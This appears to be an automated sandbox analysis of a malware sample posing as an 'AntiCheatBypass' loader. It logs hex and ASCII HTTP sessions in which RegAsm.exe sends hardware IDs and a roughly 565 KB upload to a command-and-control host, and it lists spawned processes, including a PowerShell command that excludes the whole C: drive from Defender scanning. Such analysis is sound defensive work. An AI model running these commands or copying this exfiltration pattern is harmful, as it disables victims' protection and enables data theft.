                        Host: backcreammykiel.shop
                        2024-06-23 04:54:20 UTC5447OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65
                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"54621DB669031C2126BA76F88A35DAEB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@Qude
                        2024-06-23 04:54:20 UTC808INHTTP/1.1 200 OK
                        Date: Sun, 23 Jun 2024 04:54:20 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=rmk70vfeiofeq62v5s9tkj85ip; expires=Wed, 16-Oct-2024 22:40:59 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GAkcnyfLFGrh9NVzUSiGSMFwikcihYaeOeKRQfqofcH%2Fne5yOE%2BzXj0EXGu4dl5oy7d1Ut7G2l8ZwCu8HVQZK2TwJ%2BtdRuKMThdRMXWUtoHdSYep2LhiIV6d4PQH0upaw6koRaZdjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8981e1282f5a42a9-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-06-23 04:54:20 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                        Data Ascii: eok 8.46.123.33
                        2024-06-23 04:54:20 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.449746104.21.90.184436960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        2024-06-23 04:54:21 UTC285OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 1266
                        Host: backcreammykiel.shop
                        2024-06-23 04:54:21 UTC1266OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65
                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"54621DB669031C2126BA76F88A35DAEB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@Qude
                        2024-06-23 04:54:21 UTC804INHTTP/1.1 200 OK
                        Date: Sun, 23 Jun 2024 04:54:21 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=a1urvn2ovij4tp7gknmcfjksnj; expires=Wed, 16-Oct-2024 22:41:00 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lscCgzrpha77i5uJuYvv5jeatK3sSr9XqzePCwsQVnXlcDg42yZBYcU64QPRjDt2zQWDa2ZcBKdfC7Mpw2UxzWHzH8jjKgAjIJLMbu5y7kSbeaJnS9crGp4qFp0f%2FZawumkdPx7REw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8981e12f7ef241e0-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-06-23 04:54:21 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                        Data Ascii: eok 8.46.123.33
                        2024-06-23 04:54:21 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.449747104.21.90.184436960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        2024-06-23 04:54:22 UTC287OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 565822
                        Host: backcreammykiel.shop
                        2024-06-23 04:54:22 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65
                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"54621DB669031C2126BA76F88A35DAEB--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@Qude
                        2024-06-23 04:54:22 UTC15331OUTData Raw: b9 8d 62 c7 45 16 58 ac 02 0c b5 67 3b 5c 9f 93 44 c4 12 92 f0 ea e2 d0 21 dd 5e 8f 96 f0 ca 16 bf 1a cb d1 50 7f fa 51 50 82 96 93 ee 3c 08 4a 54 09 09 5b 88 91 1b be a3 71 c5 ea d3 fa 3f 8a 51 f1 5b b2 e1 6a 1d 45 e2 43 51 17 6d b9 25 b9 0f e3 d3 c8 a8 10 6c 76 2d 2f 8f de 9a 55 d2 3c 43 d1 e2 52 6a ae 77 63 9a 88 35 cd d1 46 5f 24 d9 e3 44 bf 24 d5 8c 32 21 e8 a9 04 4e ec 55 06 0d 21 c0 cb 6b ee 35 4b 05 77 ef 44 f4 74 25 e9 6f bf d4 1b 56 03 a2 70 64 69 f5 ed f9 36 fd 6b 0a 2a bc 37 a2 ec 2f 92 f8 41 5d bd e7 83 6b ac 4a 32 69 cd 31 dc a3 9a 8b e2 ca 07 65 41 64 88 bd 01 ea 85 78 76 45 d9 5a 3c a0 b0 66 7e 0a 02 c6 ba bf e2 9a d1 03 a6 3c 16 ff 17 5b f0 83 22 20 51 3b 81 27 37 78 64 42 28 08 82 91 b0 00 b0 a4 04 c7 84 73 f1 4e ca 37 38 05 cd 1f 42 6d
                        Data Ascii: bEXg;\D!^PQP<JT[q?Q[jECQm%lv-/U<CRjwc5F_$D$2!NU!k5KwDt%oVpdi6k*7/A]kJ2i1eAdxvEZ<f~<[" Q;'7xdB(sN78Bm
                        2024-06-23 04:54:22 UTC15331OUTData Raw: 4b 1b 55 8c 8a 01 ea f9 f1 bb 56 f1 06 18 b4 18 b8 e3 00 65 b5 84 b9 52 54 a7 67 8b 1f 3b f1 31 45 8f d8 b5 66 a5 4b dd 1c 0d f3 e4 24 88 05 ab 77 7c c9 25 f1 83 55 c3 30 9b f3 ef 2c ae 70 fd 1d 55 f5 4a 8a 7c 5a 98 18 b0 05 fd d8 db 6e d0 0c c9 ca 38 ba 83 3f 71 bd 26 55 dd da 1d 0c 45 09 a1 a3 50 a4 b2 67 36 cb 62 26 04 82 7e ad 8f a5 91 4b 57 97 f8 c3 66 97 46 08 11 b1 f7 ae 3d 21 27 b9 a3 25 50 4c 70 e8 e9 d8 ab 8a 42 95 75 2a d5 7a fc 06 df a9 3b 34 75 15 f0 f2 38 97 6c c1 9e 91 19 85 87 83 18 b0 fc 14 4c 51 46 2b 88 b6 cb 46 dd 1a 8c 85 c7 43 24 c3 a4 6f c3 dd 21 52 00 a2 dd b9 7e 88 c8 bf 73 75 2f c5 a9 20 a0 d5 48 bd 75 74 6b c5 95 31 11 8b 0b 14 32 5c 4f de 65 8e 1b 4d 67 bc 50 ef 6e a2 e9 a9 20 09 84 fa 6b 8c 8a 1e 87 80 0d 2d 46 cd 5a 87 df 9b
                        Data Ascii: KUVeRTg;1EfK$w|%U0,pUJ|Zn8?q&UEPg6b&~KWfF=!'%PLpBu*z;4u8lLQF+FC$o!R~su/ Hutk12\OeMgPn k-FZ
                        2024-06-23 04:54:22 UTC15331OUTData Raw: 14 6d 64 e1 cd b9 a1 f7 c7 63 28 f1 60 04 a3 fd d3 4b 11 56 5f 6e 97 29 ac 2a 88 c5 6b e3 52 66 9e 9e fe cd 79 ee 7b 22 5b 99 9a 1a c8 1a 4e 47 98 45 19 d7 11 d1 e1 53 33 9d 32 85 8d 31 3e 3b 1c c9 a8 46 90 59 77 a8 e1 86 8f d7 75 e1 81 6f 92 8e 28 c9 bb f0 b3 04 9c ce b5 3c af 73 a4 67 c0 d6 35 4c 10 6d 79 fe 91 4a fa 83 5f b8 2a 1b e0 e9 7c ab 4f 38 cf 9f 5f 03 bc 78 da 6e 92 11 1d 25 9a 23 ed bf 21 09 d1 7a 67 08 e9 c8 a5 3e b3 07 a2 1c 7a ca 32 4a 52 6a c9 85 8c 0d 7a d9 7e 1f 97 b8 9f a0 01 8a 60 9b e1 f4 0a b4 c6 11 6f 25 c0 c7 58 4a 6b d0 48 fe e4 e0 fa cb ea 34 48 a9 7b cb ab f4 de f2 83 67 01 48 5b ac ad f7 37 9d 39 3f f8 9e 6b a7 5a 51 9f 32 1a 2e a7 7f 41 d2 18 bd d1 e2 f4 36 20 dc ae 3e a6 20 de 1c 13 3c 1b 70 35 51 67 bf 1e 4b e9 da 79 3e c6
                        Data Ascii: mdc(`KV_n)*kRfy{"[NGES321>;FYwuo(<sg5LmyJ_*|O8_xn%#!zg>z2JRjz~`o%XJkH4H{gH[79?kZQ2.A6 > <p5QgKy>
                        2024-06-23 04:54:22 UTC15331OUTData Raw: c5 21 90 7d 93 57 fd c0 72 90 08 44 3b f9 ef e1 dd b6 10 ef ef 68 a4 42 dc c6 fc 9b a5 1a 20 87 a6 85 02 d0 06 66 d3 cc 0b c5 2b 3f 5c ec f1 66 32 cd 13 9a f3 7e 97 67 c4 6d 76 ea f0 15 b4 1e 1b 4e b3 08 37 e7 99 ee 6e b2 40 f8 2b b6 2b a4 c8 07 e4 bb bc ff f2 10 6e df 66 95 c9 9b ca 20 40 a5 99 e7 54 4e 8b 8d 06 fb 4a 01 5e 1a 5d ba e7 c5 dd 6a ff b2 43 e4 1e e6 fa de 1f a8 d6 10 5f 51 b0 63 a1 b3 9c e7 8e c0 9b 89 3e d5 52 00 b1 f2 b5 cc f3 ad b8 69 66 29 ca 6e 6a 4e 75 e2 39 58 df 3b ae 1e d8 f1 88 14 0b f7 8f 79 79 e0 89 e9 e8 f0 29 b1 ae 3e 4a c5 a3 c7 7b 52 0c d6 de 7f 4b 26 62 45 dd d3 66 79 7c c1 eb a6 1b 84 b7 3e e2 b8 91 45 c4 9e a4 c9 b2 82 0c e8 89 24 1b 95 8c a7 eb c9 66 26 52 d4 f6 f5 f1 67 9f 53 7e c4 8d 77 d6 1f c5 07 f0 5d 9d e4 57 84 01
                        Data Ascii: !}WrD;hB f+?\f2~gmvN7n@++nf @TNJ^]jC_Qc>Rif)njNu9X;yy)>J{RK&bEfy|>E$f&RgS~w]W
                        2024-06-23 04:54:22 UTC15331OUTData Raw: 54 72 12 12 5b be ca ab a7 8b 5c df be ec 9f 3e 3a 97 16 47 1f 5c 52 5a 6d 09 0c c9 1c 80 03 6e 10 9c b3 6a 1e b4 95 42 36 89 19 15 bb c5 67 0e a1 80 b9 f5 c5 d7 d4 02 73 d0 1c c4 62 d4 80 1d b5 36 18 24 3a f4 db 3b 47 2b 09 9f e0 a4 bf c6 5c d7 28 fd 85 9c 4b d9 e8 fb 45 93 25 0a 14 3a e9 4a 83 f4 d4 39 27 d9 ea 73 0c f1 30 38 f0 02 7e 51 72 32 c3 0c db ac 16 9c f9 33 3e 81 95 20 f5 ea ab 3b 52 74 ea d5 db b0 11 ae f3 7d 2f 82 2d b1 d3 53 0c 51 a7 0c 64 f8 e9 b5 f8 2d 57 e0 a7 8c 30 e3 46 81 86 56 1d 1a 66 51 87 40 91 01 11 42 86 9d 2f 22 3f dd 4a 28 0a 0a 44 f6 37 10 ee 2c 8d da 75 2e ba 29 9e df f3 ab 7e 41 7e 10 04 31 fc 96 1e 95 ba 0f 09 39 f8 5f d8 fb f2 31 fd 1a f0 64 d0 76 a0 1c df 6e f0 b1 57 c2 4d e8 9e e4 bd 9f e3 db 4b 3e aa ea 22 73 fd 9f 26
                        Data Ascii: Tr[\>:G\RZmnjB6gsb6$:;G+\(KE%:J9's08~Qr23> ;Rt}/-SQd-W0FVfQ@B/"?J(D7,u.)~A~19_1dvnWMK>"s&
                        2024-06-23 04:54:22 UTC15331OUTData Raw: 5a 40 19 7a ba 80 a0 a7 83 20 2c 8e 7f ef 2f f0 dd f4 e2 d9 1f 6b cf 08 54 4a aa 58 c5 ce e5 15 c5 b7 c7 a2 5d b8 2c b3 28 32 72 22 f7 79 07 45 4e 5d d4 e9 df be c4 b2 6a 74 04 c2 9c 8f 45 a3 61 54 60 d2 5e a2 0a b2 03 a1 6b 43 7b aa 72 c0 53 1e 1d 6a 4d cb e4 d1 b1 d8 24 9f b0 25 47 c0 08 8c 5b 60 34 32 2c 5b e7 d5 dd d5 c3 e0 4d 57 bb ae 16 39 78 96 a3 41 79 b2 5e 33 0b 8e a7 9a 38 56 a7 f0 e5 f0 39 a0 c3 34 b3 f1 57 b3 28 b8 16 3d 2c 13 0b c6 39 ba 03 49 55 1f d6 4e 7a b0 11 1d cf 39 38 96 4a a7 86 88 41 8d af 10 04 58 77 fe 2c 85 1a 3e 1a 62 b4 9d a4 ca 29 fd bd 8c df 7c f0 3c 17 11 13 80 49 6a 12 22 46 06 70 ec ba 1e c3 a6 86 56 b0 4d 47 2d 2d e7 e9 a9 36 06 b2 6f 17 46 05 a5 c9 f4 bb b0 98 9e 20 cb a7 dc 5e 0b b8 71 33 bd 31 7c 23 cf 43 ee 09 84 ff
                        Data Ascii: Z@z ,/kTJX],(2r"yEN]jtEaT`^kC{rSjM$%G[`42,[MW9xAy^38V94W(=,9IUNz98JAXw,>b)|<Ij"FpVMG--6oF ^q31|#C
                        2024-06-23 04:54:22 UTC15331OUTData Raw: c5 63 00 75 e9 b7 c1 df 4a f4 2a b4 44 2a 59 a1 a3 ac 79 5b f5 94 f3 83 69 dd db ce e8 47 df 26 e4 54 7c 70 3d 0d b7 60 ff 50 41 53 67 d2 e2 3a 53 f3 74 ee 23 e2 c0 3e dd dd a0 5d 5b 15 3a 45 cf b2 36 0e 33 05 26 b9 6f 1f 36 17 a1 dd 79 35 f2 44 71 4b c6 0a 78 06 51 a0 e5 c0 42 9b 64 70 11 d6 22 35 f8 c2 54 46 eb 90 35 48 a0 fe 38 b2 22 dc e0 5d 29 ef 22 db c1 58 c8 dc d5 62 ec 9a 1a 5a c2 bc 38 91 e5 83 f0 7b ca 88 fe 17 be ce c7 09 11 7e f7 d2 55 c5 32 94 a9 72 4e 91 8e 05 cd 63 63 b8 a5 14 e6 05 c0 28 d6 07 42 9d 46 93 fe 9f a7 9e 4d f7 35 82 03 d7 ee 46 0f b1 af 92 e7 6d 44 12 3c f2 2f d7 f5 9d 14 5f 23 97 b0 33 6d 44 e2 34 aa 61 a0 33 5c d1 1c 24 1b de f5 db fd 4b c1 e2 25 84 55 90 f3 f8 bc e8 23 06 42 a3 62 f4 9a fc e4 50 35 79 05 3f d1 58 d6 ff 8e
                        Data Ascii: cuJ*D*Yy[iG&T|p=`PASg:St#>][:E63&o6y5DqKxQBdp"5TF5H8"])"XbZ8{~U2rNcc(BFM5FmD</_#3mD4a3\$K%U#BbP5y?X
                        2024-06-23 04:54:22 UTC15331OUTData Raw: a1 0c 73 af 3f 30 06 b9 c5 91 19 ee c5 82 9a 62 27 98 f2 ab 31 72 c5 87 00 a1 da b8 94 0d 50 93 ac 82 65 20 ca 85 98 d1 9c ca 89 94 e7 41 43 00 da 9c 10 e1 2b 60 0f 57 d8 8e 66 c4 55 4e 2c 7c 17 0d 5f 48 59 06 93 d8 51 a3 10 41 a7 08 d4 03 7d e7 04 2d ae a8 43 42 c4 e9 55 25 99 2b ca 1a bc 66 07 e5 5e 6c 3f 0c b1 e7 a2 62 1a 2c 3f cb 67 56 78 b0 55 93 85 92 2e 84 b9 96 44 e9 03 4f 65 8d 71 14 82 d5 2a 8a 1d 4a f1 ac 14 c1 cb d3 e5 87 e4 3b 48 02 5d 18 ac 2e b2 e5 90 18 2c f2 5a 21 80 2b 76 38 e8 db 3a 2e bd 2f 8f 76 72 5a 37 ad 28 e8 03 4d 40 43 6c be 55 34 fb 2a fe a0 99 c9 27 f4 ae 2d 4d a9 13 18 4e 75 cc 90 27 e2 d3 e5 15 f0 b2 70 8d 50 ed 87 27 89 8c fc a5 71 9a 07 c5 9f 67 09 4c 60 51 8b 31 fa c8 f3 c3 a6 d4 28 9f c8 f0 0c c6 08 47 70 a4 65 cc 9f 72
                        Data Ascii: s?0b'1rPe AC+`WfUN,|_HYQA}-CBU%+f^l?b,?gVxU.DOeq*J;H].,Z!+v8:./vrZ7(M@ClU4*'-MNu'pP'qgL`Q1(Gper
                        2024-06-23 04:54:22 UTC15331OUTData Raw: ff b1 97 f3 60 35 7a 06 6f 59 42 88 bc 20 ba 39 5d b4 7e b7 38 a3 57 b0 0a 1d 68 46 82 bc 1e a8 11 00 fd 07 0d 03 54 1c e1 79 63 3f 0e fd 9a 37 5a 4e 94 03 62 6a 74 41 06 22 78 28 45 96 0b 5c e2 a0 b8 cd 5d 5c a0 33 df 79 be 23 cf 69 7a 20 78 f9 24 b3 f6 dd d9 b9 61 f4 71 03 33 fa 7d 2e 38 75 90 36 0b 18 57 08 3b 1a a5 4a e1 7f 1d 50 6e 90 6c 4a bc f8 e3 4e 56 02 44 a9 52 8d 3e 1f 96 78 f9 5e 7a 14 c5 67 30 76 b6 7a be 34 e3 fb 10 88 30 68 39 2a aa c6 21 53 43 72 b9 cd cb 83 de 71 6c 2d 4e 7c 88 ad 16 3f 66 89 df 2d e4 e2 87 89 3b bb 22 b1 fd 5e fb 28 39 c8 6e 6e 7d 11 c0 ed 00 14 fd f7 0d 57 b4 2e dd c8 c9 68 4b fe 15 ab 64 db 59 c7 b3 75 e1 4a 5f 70 2a 20 36 89 66 33 f2 a7 86 2e 15 d6 ae 5b ae 65 01 0d cc 1a 00 10 17 37 86 83 3b 4e 73 8d b6 fe ca 9a a3
                        Data Ascii: `5zoYB 9]~8WhFTyc?7ZNbjtA"x(E\]\3y#iz x$aq3}.8u6W;JPnlJNVDR>x^zg0vz40h9*!SCrql-N|?f-;"^(9nn}W.hKdYuJ_p* 6f3.[e7;Ns
                        2024-06-23 04:54:24 UTC812INHTTP/1.1 200 OK
                        Date: Sun, 23 Jun 2024 04:54:24 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=opmnsgvvff6jri991ia0324vab; expires=Wed, 16-Oct-2024 22:41:02 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0URh9lQJDcvHIIu5A1md4QCF%2FvX%2BTAkuomdCIqLZIXcFG4A5IyG%2FexnhveA873T0NlJ3o4KepdlMyx%2BciFCQAh9Ft5lf9OYRIMvbkoXEjWW2W91tokmvdzT3WUkaVHRM64ZWKTz%2Bfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8981e136ed0c8c45-EWR
                        alt-svc: h3=":443"; ma=86400


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.449749104.21.90.184436960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        2024-06-23 04:54:24 UTC268OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 92
                        Host: backcreammykiel.shop
                        2024-06-23 04:54:24 UTC92OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 51 75 64 65 74 74 65 26 6a 3d 64 65 66 61 75 6c 74 26 68 77 69 64 3d 35 34 36 32 31 44 42 36 36 39 30 33 31 43 32 31 32 36 42 41 37 36 46 38 38 41 33 35 44 41 45 42
                        Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--@Qudette&j=default&hwid=54621DB669031C2126BA76F88A35DAEB
                        2024-06-23 04:54:25 UTC808INHTTP/1.1 200 OK
                        Date: Sun, 23 Jun 2024 04:54:25 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=kokbpffrkq4s2u644l59ija07t; expires=Wed, 16-Oct-2024 22:41:04 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d1dOMDn7X4VrA%2FGmGXWXm5Pbq6onsCPjQopJSIxfWcRvXyhD7hy5mRW7SxuDd%2Fno63O74mqQzEPDBOOV7IUtALRY7qav%2FZ9IvKICvYZnXgfq38xep4eXIiYj5AqfHjLJpKW85upTUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8981e1462ad01865-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-06-23 04:54:25 UTC54INData Raw: 33 30 0d 0a 31 49 67 45 75 35 42 2b 52 7a 37 67 62 38 7a 78 6f 59 66 45 34 56 47 34 4d 46 2b 6f 34 46 47 49 6c 4a 30 30 4d 39 6e 4e 64 52 53 50 31 51 3d 3d 0d 0a
                        Data Ascii: 301IgEu5B+Rz7gb8zxoYfE4VG4MF+o4FGIlJ00M9nNdRSP1Q==
                        2024-06-23 04:54:25 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:00:53:58
                        Start date:23/06/2024
                        Path:C:\Users\user\Desktop\bFZYRLnRIz.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\bFZYRLnRIz.exe"
                        Imagebase:0x7ff716110000
                        File size:1'939'559 bytes
                        MD5 hash:289F27E7A02F8E76EBF39D2C0C3F09E4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:1
                        Start time:00:53:59
                        Start date:23/06/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat" "
                        Imagebase:0x7ff7fb170000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:00:53:59
                        Start date:23/06/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:00:53:59
                        Start date:23/06/2024
                        Path:C:\Windows\System32\cacls.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                        Imagebase:0x7ff72e9e0000
                        File size:34'304 bytes
                        MD5 hash:A353590E06C976809F14906746109758
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:4
                        Start time:00:53:59
                        Start date:23/06/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /K C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat
                        Imagebase:0x7ff7fb170000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:00:53:59
                        Start date:23/06/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:00:53:59
                        Start date:23/06/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\'
                        Imagebase:0x7ff788560000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:00:54:02
                        Start date:23/06/2024
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
